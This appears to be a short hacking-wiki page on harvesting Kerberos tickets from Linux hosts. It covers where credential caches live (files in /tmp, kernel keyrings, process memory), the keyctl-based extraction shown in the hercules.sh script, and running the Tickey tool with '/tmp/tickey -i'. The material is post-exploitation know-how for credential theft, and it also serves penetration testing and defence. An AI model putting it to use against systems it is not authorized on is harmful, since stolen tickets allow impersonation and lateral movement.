Harvesting tickets from Linux
Last updated
Last updated
Learn & practice AWS Hacking: Learn & practice GCP Hacking:
Linux systems store credentials in three types of caches, namely Files (in /tmp
directory), Kernel Keyrings (a special segment in the Linux kernel), and Process Memory (for single-process use). The default_ccache_name variable in /etc/krb5.conf
reveals the storage type in use, defaulting to FILE:/tmp/krb5cc_%{uid}
if not specified.
The 2017 paper, , outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernel's keyring mechanism for managing and storing keys.
Keyring Extraction Overview
The keyctl system call, introduced in kernel version 2.6.10, allows user space applications to interact with kernel keyrings. Credentials in keyrings are stored as components (default principal and credentials), distinct from file ccaches which also include a header. The hercules.sh script from the paper demonstrates extracting and reconstructing these components into a usable file ccache for credential theft.
Ticket Extraction Tool: Tickey
Building on the principles of the hercules.sh script, the tool is specifically designed for extracting tickets from keyrings, executed via /tmp/tickey -i
.
Learn & practice AWS Hacking: Learn & practice GCP Hacking: